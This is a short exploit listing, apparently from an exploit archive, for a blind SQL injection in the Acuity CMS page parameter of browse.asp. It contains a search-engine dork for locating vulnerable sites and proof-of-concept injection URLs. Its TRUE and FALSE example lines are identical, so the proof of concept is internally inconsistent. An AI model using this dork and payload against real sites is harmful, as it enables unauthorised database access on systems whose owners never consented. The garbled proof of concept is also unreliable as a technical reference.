Acuity CMS Blind SQL Injection Vulnerability

2011-05-23T00:00:00
ID 1337DAY-ID-16167
Type zdt
Reporter p0pc0rn
Modified 2011-05-23T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork  : intext:"Powered by Acuity CMS."
Web   : http://www.acuitycms.com/

SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE



#  0day.today [2018-04-08]  #